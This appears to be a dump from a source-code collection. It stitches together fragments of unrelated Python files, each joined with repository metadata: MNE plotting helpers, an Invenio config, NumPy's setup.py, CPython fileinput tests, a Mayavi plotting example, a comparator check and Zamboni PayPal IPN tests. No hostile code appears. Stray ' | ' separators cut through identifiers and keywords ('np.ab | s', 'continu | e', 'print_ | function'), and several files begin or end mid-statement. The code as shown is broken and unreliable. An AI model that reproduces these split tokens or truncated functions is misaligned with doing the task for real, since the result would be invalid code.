if len(ax_idx) == 0: # this can happen if ax param is used
return # let the other axes handle it
else:
ax_idx = ax_idx[0]
lidx = np.where([l is event.artist for l in params['lines'][ax_idx]])[0][0]
ch_name = params['ch_names'][params['idxs'][ax_idx][lidx]]
text = params['texts'][ax_idx]
x = event.artist.get_xdata()[event.ind[0]]
y = event.artist.get_ydata()[event.ind[0]]
text.set_x(x)
text.set_y(y)
text.set_text(ch_name)
text.set_color(event.artist.get_color())
text.set_alpha(1.)
text.set_zorder(len(ax.lines)) # to make sure it goes on top of the lines
text.set_path_effects(params['path_effects'])
# do NOT redraw here, since for butterfly plots hundreds of lines could
# potentially be picked -- use on_button_press (happens once per click)
# to do the drawing
def _butterfly_on_button_press(event, params):
"""Only draw once for picking."""
if params['need_draw']:
event.canvas.draw()
else:
idx = np.where([event.inaxes is ax for ax in params['axes']])[0]
if len(idx) == 1:
text = params['texts'][idx[0]]
text.set_alpha(0.)
text.set_path_effects([])
event.canvas.draw()
params['need_draw'] = False
def _line_plot_onselect(xmin, xmax, ch_types, info, data, times, text=None,
psd=False, time_unit='s'):
"""Draw topomaps from the selected area."""
import matplotlib.pyplot as plt
ch_types = [type_ for type_ in ch_types if type_ in ('eeg', 'grad', 'mag')]
if len(ch_types) == 0:
raise ValueError('Interactive topomaps only allowed for EEG '
'and MEG channels.')
if ('grad' in ch_types and
len(_pair_grad_sensors(info, topomap_coords=False,
raise_error=False)) < 2):
ch_types.remove('grad')
if len(ch_types) == 0:
return
vert_lines = list()
if text is not None:
text.set_visible(True)
ax = text.axes
vert_lines.append(ax.axvline(xmin, zorder=0, color='red'))
vert_lines.append(ax.axvline(xmax, zorder=0, color='red'))
fill = ax.axvspan(xmin, xmax, alpha=0.2, color='green')
evoked_fig = plt.gcf()
evoked_fig.canvas.draw()
evoked_fig.canvas.flush_events()
minidx = np.abs(times - xmin).argmin()
maxidx = np.ab | s(times - xmax).argmin()
fig, axarr = plt.subplots(1, len(ch_types), squeeze=False,
figsize=(3 * len(ch_types), 3))
for idx, ch_type in enumerate(ch_types):
if ch_type not in ('eeg', 'grad', 'mag'):
continu | e
picks, pos, merge_grads, _, ch_type = _prepare_topo_plot(
info, ch_type, layout=None)
if len(pos) < 2:
fig.delaxes(axarr[0][idx])
continue
this_data = data[picks, minidx:maxidx]
if merge_grads:
from ..channels.layout import _merge_grad_data
method = 'mean' if psd else 'rms'
this_data = _merge_grad_data(this_data, method=method)
title = '%s %s' % (ch_type, method.upper())
else:
title = ch_type
this_data = np.average(this_data, axis=1)
axarr[0][idx].set_title(title)
vmin = min(this_data) if psd else None
vmax = max(this_data) if psd else None # All negative for dB psd.
cmap = 'Reds' if psd else None
plot_topomap(this_data, pos, cmap=cmap, vmin=vmin, vmax=vmax,
axes=axarr[0][idx], show=False)
unit = 'Hz' if psd else time_unit
fig.suptitle('Average over %.2f%s - %.2f%s' % (xmin, unit, xmax, unit),
y=0.1)
tight_layout(pad=2.0, fig=fig)
plt_show()
if text is not None:
text.set_visible(False)
close_callback = partial(_topo_closed, ax=ax, lines=vert_lines,
fill=fill)
fig.canvas.mpl_connect('close_event', close_callback)
evoked_fig.canvas.draw()
evoked_fig.canvas.flush_events()
def _topo_closed(events, ax, lines, fill):
"""Remove lines from evoked plot as topomap is closed."""
for line in lines:
ax.lines.remove(line)
ax.patches.remove(fill)
ax.get_figure().canvas.draw()
def _rgb(x, y, z):
"""Transform x, y, z values into RGB colors."""
rgb = np.array([x, y, z]).T
rgb -= rgb.min(0)
rgb /= np.maximum(rgb.max(0), 1e-16) # avoid div by zero
return rgb
def _plot_legend(pos, colors, axis, bads, outlines, loc, size=30):
"""Plot (possibly colorized) channel legends for evoked plots."""
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
axis.get_figure().canvas.draw()
bbox = axis.get_window_extent() # Determine the correct size.
ratio = bbox.width / bbox.height
ax = inset_axes(axis, width=str(size / ratio) + '%',
height=str(size) + '%', loc=loc)
ax.set_adjustable("box")
pos_x, pos_y = _prepare_topomap(pos, ax, check_nonzero=False)
ax.scatter(pos_x, pos_y, color=colors, s=size * .8, marker='.', zorder=1)
if bads:
bads = np.array(bads)
ax.scatter(pos_x[bads], pos_y[bads], s=size / 6, marker='.',
color='w', zorder=1)
_draw_outlines(ax, outlines)
def _plot_evoked(evoked, picks, exclude, unit, show, ylim, proj, xlim, hline,
units, scalings, titles, axes, plot_type, cmap=None,
gfp=False, window_title=None, spatial_colors=False,
set_tight_layout=True, selectable=True, zorder='unsorted',
noise_cov=None, colorbar=True, mask=None, mask_style=None,
mask_cmap=None, mask_alpha=.25, time_unit='s',
show_names=False, group_by=None):
"""Aux function for plot_evoked and plot_evoked_image (cf. docstrings).
Extra param is:
plot_type : str, value ('butterfly' | 'image')
The type of graph to plot: 'butterfly' plots each channel as a line
(x axis: time, y axis: amplitude). 'image' plots a 2D image where
color depicts the amplitude |
tiborsimko/invenio-formatter | invenio_formatter/config.py | Python | mit | 479 | 0 | # -*- coding: utf-8 -*-
#
# | This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Configuration for Invenio-Formatter."""
from __future__ import absolute_import, print_ | function
FORMATTER_BADGES_ALLOWED_TITLES = ['DOI']
"""List of allowed titles in badges."""
FORMATTER_BADGES_TITLE_MAPPING = {}
"""Mapping of titles."""
|
endolith/numpy | setup.py | Python | bsd-3-clause | 17,447 | 0.002923 | #!/usr/bin/env python3
""" NumPy is the fundamental package for array computing with Python.
It provides:
- a powerful N-dimensional array object
- sophisticated (broadcasting) functions
- tools for integrating C/C++ and Fortran code
- useful linear algebra, Fourier transform, and random number capabilities
- and much more
Besides its obvious scientific uses, NumPy can also be used as an efficient
multi-dimensional container of generic data. Arbitrary data-types can be
defined. This allows NumPy to seamlessly and speedily integrate with a wide
variety of databases.
All NumPy wheels distributed on PyPI are BSD licensed.
"""
DOCLINES = (__doc__ or '').split("\n")
import os
import sys
import subprocess
import textwrap
import sysconfig
if sys.version_info[:2] < (3, 6):
raise RuntimeError("Python version >= 3.6 required.")
import builtins
CLASSIFIERS = """\
Development Status :: 5 - Production/Stable
Intended Audience :: Science/Research
Intended Audience :: Developers
License :: OSI Approved
Programming Language :: C
Programming Language :: Python
Programming Language :: Python :: 3
Programming Language :: Python :: 3.6
Programming Language :: Python :: 3.7
Programming Language :: Python :: 3.8
Programming Language :: Python :: 3 :: Only
Programming Language :: Python :: Implementation :: CPython
Topic :: Software Development
Topic :: Scientific/Engineering
Operating System :: Microsoft :: Windows
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""
MAJOR = 1
MINOR = 19
MICRO = 0
ISRELEASED = False
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
# Return the git revision as a string
def git_version():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT, env=env)
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except (subprocess.SubprocessError, OSError):
GIT_REVISION = "Unknown"
if not GIT_REVISION:
# this shouldn't happen but apparently can (see gh-8512)
GIT_REVISION = "Unknown"
return GIT_REVISION
# BEFORE importing setuptools, remove MANIFEST. Otherwise it may not be
# properly updated when the contents of directories change (true for distutils,
# not sure about setuptools).
if os.path.exists('MANIFEST'):
os.remove('MANIFEST')
# This is a bit hackish: we are setting a global variable so that the main
# numpy __init__ can detect if it is being loaded by the setup routine, to
# avoid attempting to load components that aren't built yet. While ugly, it's
# a lot more robust than what was previously being used.
builtins.__NUMPY_SETUP__ = True
def get_version_info():
# Adding the git rev number needs to be done inside write_version_py(),
# otherwise the import of numpy.version messes up the build under Python 3.
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
elif os.path.exists('numpy/version.py'):
# must be a source distribution, use existing version file
try:
from numpy.version import git_revision as GIT_REVISION
except ImportError:
raise ImportError("Unable to import git_revision. Try removing "
"numpy/version.py and the build directory "
"before building.")
else:
GIT_REVISION = "Unknown"
if not ISRELEASED:
FULLVERSION += '.dev0+' + GIT_REVISION[:7]
return FULLVERSION, GIT_REVISION
def write_version_py(filename='numpy/version.py'):
    """Generate *filename* with the version/git-revision constants baked in.

    The file is rewritten on every build so that ``numpy.version`` always
    reflects the current checkout.
    """
    cnt = """
# THIS FILE IS GENERATED FROM NUMPY SETUP.PY
#
# To compare versions robustly, use `numpy.lib.NumpyVersion`
short_version = '%(version)s'
version = '%(version)s'
full_version = '%(full_version)s'
git_revision = '%(git_revision)s'
release = %(isrelease)s
if not release:
    version = full_version
"""
    FULLVERSION, GIT_REVISION = get_version_info()
    # ``with`` guarantees the file is closed even if the write fails,
    # replacing the manual open()/try/finally of the original.
    with open(filename, 'w') as a:
        a.write(cnt % {'version': VERSION,
                       'full_version': FULLVERSION,
                       'git_revision': GIT_REVISION,
                       'isrelease': str(ISRELEASED)})
def configuration(parent_package='',top_path=None):
    """numpy.distutils entry point: assemble the top-level package config."""
    from numpy.distutils.misc_util import Configuration
    config = Configuration(None, parent_package, top_path)
    config.set_options(ignore_setup_xxx_py=True,
                       assume_default_configuration=True,
                       delegate_options_to_subpackages=True,
                       quiet=True)
    config.add_subpackage('numpy')
    # Ship the license and the Cython declaration file with the package.
    config.add_data_files(('numpy', 'LICENSE.txt'))
    config.add_data_files(('numpy', 'numpy/__init__.pxd'))
    config.get_version('numpy/version.py') # sets config.version
    return config
def check_submodules():
    """Verify that git submodules are checked out and clean.

    Raises ValueError when a submodule directory is missing or dirty;
    fix with ``git submodule update --init``.  No-op outside a git
    checkout.
    """
    if not os.path.exists('.git'):
        return
    with open('.gitmodules') as f:
        for line in f:
            if 'path' in line:
                p = line.split('=')[-1].strip()
                if not os.path.exists(p):
                    raise ValueError(f'Submodule {p} missing')
    # subprocess.run replaces the manual Popen/communicate dance.
    proc = subprocess.run(['git', 'submodule', 'status'],
                          stdout=subprocess.PIPE)
    status = proc.stdout.decode("ascii", "replace")
    for line in status.splitlines():
        # '-' means not initialized, '+' means checked-out commit differs.
        if line.startswith(('-', '+')):
            raise ValueError(f'Submodule not clean: {line}')
class concat_license_files():
    """Context manager that temporarily appends LICENSES_bundled.txt to
    LICENSE.txt (used while building an sdist) and restores the pristine
    LICENSE.txt on exit.

    Keeping LICENSE.txt as exact BSD 3-clause in the repo lets GitHub
    report the license correctly (see gh-13447).
    """
    def __init__(self):
        self.f1 = 'LICENSE.txt'
        self.f2 = 'LICENSES_bundled.txt'

    def __enter__(self):
        """Append the bundled-licenses text to LICENSE.txt."""
        with open(self.f1, 'r') as bsd_file:
            self.bsd_text = bsd_file.read()
        with open(self.f2, 'r') as bundled_file:
            self.bundled_text = bundled_file.read()
        with open(self.f1, 'a') as bsd_file:
            bsd_file.write('\n\n')
            bsd_file.write(self.bundled_text)

    def __exit__(self, exception_type, exception_value, traceback):
        """Write the original BSD text back into LICENSE.txt."""
        with open(self.f1, 'w') as bsd_file:
            bsd_file.write(self.bsd_text)
from distutils.command.sdist import sdist
class sdist_checked(sdist):
    """ check submodules on sdist to prevent incomplete tarballs """
    def run(self):
        # Fail fast on missing/dirty submodules, and build the sdist with
        # the merged license text (LICENSE.txt is restored afterwards).
        check_submodules()
        with concat_license_files():
            sdist.run(self)
def get_build_overrides():
"""
Custom build commands to add `-std=c99` to compilation
"""
from numpy.distutils.command.build_clib import build_clib
from numpy.distutils.command.build_ext import build_ext
def _is_using_gcc(obj):
is_gcc = False
if obj.compiler.compiler_type == 'unix':
cc = sysconfig.get_config_var("CC")
if not cc:
cc = ""
compiler_name = os.path.basename(cc)
is_gcc = "gcc" in compiler_name
return is_gcc
| class new_build_clib(build_clib):
def build_a_library(self, build_info, lib_name | , libraries):
if _is_using_gcc(self):
args = build_info.get('extra_compiler_args') or []
args.append('-std=c99')
build_info['extra_compiler_args'] = args
build_clib.build_a_library(self, build_info, lib_name, libraries)
class new_build_ext(build_ext):
def build_exten |
yotchang4s/cafebabepy | src/main/python/test/test_fileinput.py | Python | bsd-3-clause | 38,669 | 0.001215 | '''
Tests for fileinput module.
Nick Mathewson
'''
import os
import sys
import re
import fileinput
import collections
import builtins
import unittest
try:
import bz2
except ImportError:
bz2 = None
try:
import gzip
except ImportError:
gzip = None
from io import BytesIO, StringIO
from fileinput import FileInput, hook_encoded
from test.support import verbose, TESTFN, check_warnings
from test.support import unlink as safe_unlink
from test import support
from unittest import mock
# The fileinput module has 2 interfaces: the FileInput class which does
# all the work, and a few functions (input, etc.) that use a global _state
# variable.
# Write lines (a list of lines) to temp file number i, and return the
# temp file's name.
def writeTmp(i, lines, mode='w'):  # opening in text mode is the default
    """Write *lines* to temp file number *i* and return the file's name."""
    name = TESTFN + str(i)
    # ``with`` replaces the manual open/close and guarantees the file is
    # flushed and closed even if a write fails.
    with open(name, mode) as f:
        for line in lines:
            f.write(line)
    return name
def remove_tempfiles(*names):
    """Delete every truthy temp-file name given (via test.support's unlink)."""
    for tmp_name in filter(None, names):
        safe_unlink(tmp_name)
class LineReader:
    """A fake file object fed to FileInput via its *openhook* protocol.

    The "file name" handed to :meth:`openhook` is itself the content to
    serve, one line at a time.  Every line handed out (including the final
    empty string) is recorded so tests can inspect the read pattern.
    """
    def __init__(self):
        self._linesread = []

    @property
    def linesread(self):
        """Lines served since the last access; reading this resets the log."""
        seen = self._linesread[:]
        self._linesread = []
        return seen

    def openhook(self, filename, mode):
        # Treat *filename* as the data itself, split into keepends lines.
        self.it = iter(filename.splitlines(True))
        return self

    def readline(self, size=None):
        # Exhausted input yields '' just like a real file object.
        current = next(self.it, '')
        self._linesread.append(current)
        return current

    def readlines(self, hint=-1):
        collected = []
        total = 0
        while True:
            current = self.readline()
            if not current:
                break
            collected.append(current)
            total += len(current)
            # Stop once *hint* characters have been served (the default
            # hint of -1 therefore yields at most one line per call).
            if total >= hint:
                break
        return collected

    def close(self):
        pass
class BufferSizesTests(unittest.TestCase):
    """Exercise FileInput behaviour with and without the (deprecated)
    explicit *bufsize* argument."""
    def test_buffer_sizes(self):
        # First, run the tests with default and teeny buffer size.
        for round, bs in (0, 0), (1, 30):
            t1 = t2 = t3 = t4 = None
            try:
                t1 = writeTmp(1, ["Line %s of file 1\n" % (i+1) for i in range(15)])
                t2 = writeTmp(2, ["Line %s of file 2\n" % (i+1) for i in range(10)])
                t3 = writeTmp(3, ["Line %s of file 3\n" % (i+1) for i in range(5)])
                t4 = writeTmp(4, ["Line %s of file 4\n" % (i+1) for i in range(1)])
                if bs:
                    # A non-zero bufsize is deprecated and must warn.
                    with self.assertWarns(DeprecationWarning):
                        self.buffer_size_test(t1, t2, t3, t4, bs, round)
                else:
                    self.buffer_size_test(t1, t2, t3, t4, bs, round)
            finally:
                remove_tempfiles(t1, t2, t3, t4)
    def buffer_size_test(self, t1, t2, t3, t4, bs=0, round=0):
        # The four files hold 15 + 10 + 5 + 1 = 31 lines in total.
        pat = re.compile(r'LINE (\d+) OF FILE (\d+)')
        start = 1 + round*6
        if verbose:
            print('%s. Simple iteration (bs=%s)' % (start+0, bs))
        fi = FileInput(files=(t1, t2, t3, t4), bufsize=bs)
        lines = list(fi)
        fi.close()
        self.assertEqual(len(lines), 31)
        self.assertEqual(lines[4], 'Line 5 of file 1\n')
        self.assertEqual(lines[30], 'Line 1 of file 4\n')
        self.assertEqual(fi.lineno(), 31)
        self.assertEqual(fi.filename(), t4)
        if verbose:
            print('%s. Status variables (bs=%s)' % (start+1, bs))
        fi = FileInput(files=(t1, t2, t3, t4), bufsize=bs)
        s = "x"
        while s and s != 'Line 6 of file 2\n':
            s = fi.readline()
        self.assertEqual(fi.filename(), t2)
        self.assertEqual(fi.lineno(), 21)
        self.assertEqual(fi.filelineno(), 6)
        self.assertFalse(fi.isfirstline())
        self.assertFalse(fi.isstdin())
        if verbose:
            print('%s. Nextfile (bs=%s)' % (start+2, bs))
        fi.nextfile()
        self.assertEqual(fi.readline(), 'Line 1 of file 3\n')
        self.assertEqual(fi.lineno(), 22)
        fi.close()
        if verbose:
            print('%s. Stdin (bs=%s)' % (start+3, bs))
        # A '-' entry reads from (the substituted) sys.stdin.
        fi = FileInput(files=(t1, t2, t3, t4, '-'), bufsize=bs)
        savestdin = sys.stdin
        try:
            sys.stdin = StringIO("Line 1 of stdin\nLine 2 of stdin\n")
            lines = list(fi)
            self.assertEqual(len(lines), 33)
            self.assertEqual(lines[32], 'Line 2 of stdin\n')
            self.assertEqual(fi.filename(), '<stdin>')
            fi.nextfile()
        finally:
            sys.stdin = savestdin
        if verbose:
            print('%s. Boundary conditions (bs=%s)' % (start+4, bs))
        fi = FileInput(files=(t1, t2, t3, t4), bufsize=bs)
        self.assertEqual(fi.lineno(), 0)
        self.assertEqual(fi.filename(), None)
        fi.nextfile()
        self.assertEqual(fi.lineno(), 0)
        self.assertEqual(fi.filename(), None)
        if verbose:
            print('%s. Inplace (bs=%s)' % (start+5, bs))
        savestdout = sys.stdout
        try:
            # In inplace mode, print() output is redirected back into the
            # files, so this upper-cases every line on disk.
            fi = FileInput(files=(t1, t2, t3, t4), inplace=1, bufsize=bs)
            for line in fi:
                line = line[:-1].upper()
                print(line)
            fi.close()
        finally:
            sys.stdout = savestdout
        fi = FileInput(files=(t1, t2, t3, t4), bufsize=bs)
        for line in fi:
            self.assertEqual(line[-1], '\n')
            m = pat.match(line[:-1])
            self.assertNotEqual(m, None)
            self.assertEqual(int(m.group(1)), fi.filelineno())
        fi.close()
class UnconditionallyRaise:
    """A callable that always raises its configured exception type.

    The ``invoked`` flag records whether the object was ever called, so a
    test can assert that a patched-in failure point was actually reached.
    """
    def __init__(self, exception_type):
        self.invoked = False
        self.exception_type = exception_type
    def __call__(self, *args, **kwargs):
        # Record the call before raising so callers can verify it happened.
        self.invoked = True
        raise self.exception_type()
class FileInputTests(unittest.TestCase):
    def test_zero_byte_files(self):
        """Empty files are skipped; counters reflect the non-empty file."""
        t1 = t2 = t3 = t4 = None
        try:
            t1 = writeTmp(1, [""])
            t2 = writeTmp(2, [""])
            t3 = writeTmp(3, ["The only line there is.\n"])
            t4 = writeTmp(4, [""])
            fi = FileInput(files=(t1, t2, t3, t4))
            line = fi.readline()
            self.assertEqual(line, 'The only line there is.\n')
            self.assertEqual(fi.lineno(), 1)
            self.assertEqual(fi.filelineno(), 1)
            self.assertEqual(fi.filename(), t3)
            # No more data anywhere: readline() returns '' and the cursor
            # has moved on to the final (empty) file.
            line = fi.readline()
            self.assertFalse(line)
            self.assertEqual(fi.lineno(), 1)
            self.assertEqual(fi.filelineno(), 0)
            self.assertEqual(fi.filename(), t4)
            fi.close()
        finally:
            remove_tempfiles(t1, t2, t3, t4)
    def test_files_that_dont_end_with_newline(self):
        """A final line without a trailing newline must still be yielded."""
        t1 = t2 = None
        try:
            t1 = writeTmp(1, ["A\nB\nC"])
            t2 = writeTmp(2, ["D\nE\nF"])
            fi = FileInput(files=(t1, t2))
            lines = list(fi)
            self.assertEqual(lines, ["A\n", "B\n", "C", "D\n", "E\n", "F"])
            self.assertEqual(fi.filelineno(), 3)
            self.assertEqual(fi.lineno(), 6)
        finally:
            remove_tempfiles(t1, t2)
## def test_unicode_filenames(self):
## # XXX A unicode string is always returned by writeTmp.
## # So is this needed?
## try:
## t1 = writeTmp(1, ["A\nB"])
## encoding = sys.getfilesystemencoding()
## if encoding is None:
## encoding = 'ascii'
## fi = FileInput(files=str(t1, encoding))
## lines = list(fi)
## self.assertEqual(lines, ["A\n", "B"])
## finally:
## remove_tempfiles(t1)
def test_fileno(self):
t1 = t2 = None
try:
t1 = writeTmp(1, ["A\nB"])
t2 = writeTmp(2, ["C\nD"])
fi = FileInput(files=(t1, t2))
self.assertEqual(fi.fileno(), -1)
line =next( fi)
self.assertNotEqual(fi.fileno(), -1)
fi.nextfile()
self.assertEqual(fi.fileno(), -1)
line = list(fi)
self.assertEqual(fi.fileno(), -1)
finally:
remove_tempfiles(t1, t2)
def test_opening_mode(self):
|
dmsurti/mayavi | examples/mayavi/mlab/spherical_harmonics.py | Python | bsd-3-clause | 1,373 | 0 | """
Plot spherical harmonics on the surface of the sphere, as well as a 3D
polar plot.
This example requires scipy.
In this example we use the mlab's mesh function:
:func:`mayavi.mlab.mesh`.
For plotting surfaces this is a very versatile function. The surfaces can
be defined as functions of a 2D grid.
For each spherical harmonic, we plot its value on the surface of a
sphere, and then in polar. The polar plot is simply obtained by varying
the radius of the previous sphere.
"""
# Author: Gael Varoquaux <gael.varoquaux@normalesup.org>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
from mayavi import mlab
import numpy as np
from scipy.special import sph_harm
# Create a sphere
r = 0.3  # sphere radius
pi = np.pi
cos = np.cos
sin = np.sin
# 101x101 grid of (phi, theta) angles covering the full sphere.
phi, theta = np.mgrid[0:pi:101j, 0:2 * pi:101j]
# Cartesian coordinates of the sphere surface.
x = r * sin(phi) * cos(theta)
y = r * sin(phi) * sin(theta)
z = r * cos(phi)
mlab.figure(1, bgcolor=(1, 1, 1), fgcolor=(0, 0, 0), size=(400, 300))
mlab.clf()
# Represent spherical harmonics on the surface of the sphere
for n in range(1, 6):
    for m in range(n):
        # Real part of the degree-n, order-m harmonic sampled on the grid.
        s = sph_harm(m, n, theta, phi).real
        # Color the sphere surface by the harmonic; each (m, n) pair is
        # offset into its own cell of the layout.
        mlab.mesh(x - m, y - n, z, scalars=s, colormap='jet')
        # Polar plot above: modulate the radius by the normalized harmonic
        # (negative lobes slightly shrunk so both lobes stay visible).
        s[s < 0] *= 0.97
        s /= s.max()
        mlab.mesh(s * x - m, s * y - n, s * z + 1.3,
                  scalars=s, colormap='Spectral')
mlab.view(90, 70, 6.2, (-1.3, -2.9, 0.25))
mlab.show()
|
bhdz/scalint | checks/ch_comparator.py | Python | apache-2.0 | 472 | 0.061441 |
from scalint.scalar_comparator import NativeComparator
cmpr = NativeComparator()
# Sanity checks for native Python comparison of numbers and tuples:
# the comparator must return its LT/EQ/GT constants accordingly.
assert cmpr(1,3) == cmpr.LT
assert cmpr(2,2) == cmpr.EQ
assert cmpr(3,1) == cmpr.GT
# Tuples are expected to compare lexicographically, element by element...
assert cmpr( (1,1), (1,3) ) == cmpr.LT
assert cmpr( (2,2), (2,2) ) == cmpr.EQ
assert cmpr( (3,1), (2,1) ) == cmpr.GT
# ...and a shorter tuple that is a prefix of a longer one sorts first.
assert cmpr( (1,) , (1,3) ) == cmpr.LT
assert cmpr( (1,3), (1,3) ) == cmpr.EQ
assert cmpr( (1,1,1), (1,1) ) == cmpr.GT
Joergen/zamboni | apps/paypal/tests/test_views.py | Python | bsd-3-clause | 18,653 | 0.000322 | # -*- coding: utf-8 -*-
from decimal import Decimal
import urllib
from django import http, test
from django.conf import settings
from django.core import mail
from mock import patch, Mock
from nose.tools import eq_
from test_utils import RequestFactory
import waffle
import amo.tests
from amo.urlresolvers import reverse
from addons.models import Addon
from market.models import Price
from stats.models import Contribution
from users.models import UserProfile
from paypal import views, PaypalError
from paypal.decorators import handle_paypal_error
URL_ENCODED = 'application/x-www-form-urlencoded'
class Client(test.Client):
    """Test client that uses form-urlencoded (like browsers)."""
    def post(self, url, data={}, **kw):
        # NOTE(review): the mutable default is harmless here because *data*
        # is only reassigned, never mutated in place.
        if hasattr(data, 'items'):
            # Serialize dict-like payloads the way a browser form would.
            data = urllib.urlencode(data)
        kw['content_type'] = URL_ENCODED
        return super(Client, self).post(url, data, **kw)
# These are taken from the real IPNs paypal returned to us.
# TODO(andym): compress all these down, at this moment they are
# a bit verbose.
sample_refund = {
'action_type': 'PAY',
'charset': 'windows-1252',
'cancel_url': 'http://some.url/cancel',
'notify_version': 'UNVERSIONED',
'pay_key': '1234',
'payment_request_date': 'Mon Nov 21 15:23:02 PST 2011',
'reason_code': 'Refund',
'return_url': 'http://some.url/complete',
'reverse_all_parallel_payments_on_error': 'false',
'sender_email': 'some.other@gmail.com',
'status': 'COMPLETED',
'tracking_id': '5678',
'transaction[0].amount': 'USD 1.00',
'transaction[0].id': 'ABC',
'transaction[0].id_for_sender_txn': 'DEF',
'transaction[0].is_primary_receiver': 'false',
'transaction[0].paymentType': 'DIGITALGOODS',
'transaction[0].pending_reason': 'NONE',
'transaction[0].receiver': 'some@gmail.com',
'transaction[0].refund_account_charged': 'some@gmail.com',
'transaction[0].refund_amount': 'USD 0.01',
'transaction[0].refund_id': 'XYZ',
'transaction[0].status': 'Refunded',
'transaction[0].status_for_sender_txn': 'Refunded',
'transaction_type': 'Adjustment',
'verify_sign': 'xyz'
}
sample_chained_refund = {
'action_type': 'PAY',
'charset': 'windows-1252',
'fees_payer': 'SECONDARYONLY',
'log_default_shipping_address_in_transaction': 'false',
'memo': 'Purchase of Sinuous-andy-video-test',
'notify_version': 'UNVERSIONED',
'pay_key': '1234',
'payment_request_date': 'Mon Apr 02 12:51:50 PDT 2012',
'reason_code': 'Refund',
'reverse_all_parallel_payments_on_error': 'false',
'sender_email': 'some-1@gmail.com',
'status': 'COMPLETED',
'test_ipn': '1',
'tracking_id': '5678',
'transaction[0].amount': 'USD 0.99',
'transaction[0].id': 'ABC',
'transaction[0].id_for_sender_txn': 'DEF',
'transaction[0].is_primary_receiver': 'true',
'transaction[0].paymentType': 'DIGITALGOODS',
'transaction[0].pending_reason': 'NONE',
'transaction[0].receiver': 'some-2@gmail.com',
'transaction[0].status': 'Refunded',
'transaction[0].status_for_sender_txn': 'Refunded',
'transaction[1].amount': 'USD 0.30',
'transaction[1].id': 'ABC',
'transaction[1].id_for_sender_txn': 'ASD',
'transaction[1].is_primary_receiver': 'false',
'transaction[1].paymentType': 'DIGITALGOODS',
'transaction[1].pending_reason': 'NONE',
'transaction[1].receiver': 'some-3@gmail.com',
'transaction[1].refund_account_charged': 'some-3@gmail.com',
'transaction[1].refund_amount': 'USD 0.30',
'transaction[1].refund_id': 'XYX',
'transaction[1].status': 'Refunded',
'transaction[1].status_for_sender_txn': 'Refunded',
'transaction_type': 'Adjustment',
'verify_sign': 'xyz',
}
sample_purchase = {
'action_type': 'PAY',
'cancel_url': 'http://some.url/cancel',
'charset': 'windows-1252',
'fees_payer': 'EACHRECEIVER',
'ipn_notification_url': 'http://some.url.ipn',
'log_default_shipping_address_in_transaction': 'false',
'memo': 'Purchase of Sinuous',
'notify_version': 'UNVERSIONED',
'pay_key': '1234',
'payment_request_date': 'Mon Nov 21 22:30:48 PST 2011',
'return_url': 'http://some.url/return',
'reverse_all_parallel_payments_on_error': 'false',
'sender_email': 'some.other@gmail.com',
'status': 'COMPLETED',
'test_ipn': '1',
'tracking_id': '5678',
'transaction[0].amount': 'USD 0.01',
'transaction[0].id': 'ABC',
'transaction[0].id_for_sender_txn': 'DEF',
'transaction[0].is_primary_receiver': 'false',
'transaction[0].paymentType': 'DIGITALGOODS',
'transaction[0].pending_reason': 'NONE',
'transaction[0].receiver': 'some@gmail.com',
'transaction[0].status': 'Completed',
'transaction[0].status_for_sender_txn': 'Completed',
'transaction_type': 'Adaptive Payment PAY',
'verify_sign': 'zyx'
}
sample_contribution = {
'action_type': 'PAY',
'cancel_url': 'http://some.url/cancel',
'charset': 'windows-1252',
'fees_payer': 'EACHRECEIVER',
'ipn_notification_url': 'http://some.url.ipn',
'log_default_shipping_address_in_transaction': 'false',
'memo': 'Contribution for cool addon',
'notify_version': 'UNVERSIONED',
'pay_key': '1235',
'payment_request_date': 'Mon Nov 21 23:20:00 PST 2011',
'return_url': 'http://some.url/return',
'reverse_all_parallel_payments_on_error': 'false',
'sender_email': 'some.other@gmail.com',
'status': 'COMPLETED',
'test_ipn': '1',
'tracking_id': '6789',
'transaction[0].amount': 'USD 1.00',
'transaction[0].id': 'yy',
'transaction[0].id_for_sender_txn': 'xx',
'transaction[0].is_primary_receiver': 'false',
'transaction[0].paymentType': 'DIGITALGOODS',
'transaction[0].pending_reason': 'NONE',
'transaction[0].receiver': 'some.other@gmail.com',
'transaction[0].status': 'Completed',
'transaction[0].status_for_sender_txn': 'Completed',
'transaction_type': 'Adaptive Payment PAY',
'verify_sign': 'ZZ'
}
sample_reversal = sample_refund.copy()
sample_reversal['transaction[0].status'] = 'reversal'
class PaypalTest(amo.tests.TestCase):
    """Shared fixture base for tests hitting the PayPal IPN endpoint."""
    def setUp(self):
        self.url = reverse('amo.paypal')
        self.item = 1234567890
        self.client = Client()
    def urlopener(self, status):
        """Return a mock response object whose ``text`` body is *status*."""
        m = Mock()
        m.text = status
        return m
@patch('paypal.views.client.post_ipn')
class TestPaypalSolitude(PaypalTest):
fixtures = ['base/users', 'base/addon_3615']
    def setUp(self):
        # Enable the solitude-payments waffle flag for everyone so these
        # tests exercise the solitude IPN code path.
        waffle.models.Flag.objects.create(name='solitude-payments',
                                          everyone=True)
        self.addon = Addon.objects.get(pk=3615)
        self.url = reverse('amo.paypal')
        self.user = UserProfile.objects.get(pk=999)
    def test_ignore(self, post_ipn):
        """An IPN that solitude reports as IGNORED is acknowledged as such."""
        post_ipn.return_value = {'status': 'IGNORED'}
        res = self.client.post(self.url, {})
        eq_(res.content, 'Ignored')
    def test_payment(self, post_ipn):
        """A PAYMENT IPN matching an existing contribution uuid succeeds."""
        Contribution.objects.create(uuid=sample_purchase['tracking_id'],
                                    addon=self.addon)
        post_ipn.return_value = {'action': 'PAYMENT', 'status': 'OK',
                                 'uuid': sample_purchase['tracking_id']}
        res = self.client.post(self.url, {})
        eq_(res.content, 'Success!')
